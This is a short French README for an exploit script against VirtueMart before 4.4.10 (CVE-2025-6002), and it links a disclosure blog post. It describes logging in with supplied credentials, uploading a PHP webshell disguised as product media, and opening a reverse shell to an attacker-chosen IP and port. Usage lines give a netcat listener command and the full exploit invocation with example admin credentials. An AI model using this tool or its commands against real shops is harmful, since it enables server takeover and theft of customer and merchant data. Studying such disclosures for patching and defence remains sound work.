
Ce script exploite la vulnérabilité de téléversement arbitraire de fichiers authentifié dans VirtueMart < 4.4.10 (CVE-2025-6002), décrite dans cet article de blog : https://blog.blacklanternsecurity.com/p/doomla-zero-days
Ce script se connecte à VirtueMart avec les identifiants fournis, crée un nouveau produit et téléverse un webshell PHP en tant que fichier média. Il invoque ensuite un reverse shell vers l'IP/le port fournis.
Paramètres :
Utilisation :
nc -nlvp 1337
python3 exploit.py --url http://x.x.x.x --username admin --password kartoffel --remote-ip x.x.x.x --remote-port 1337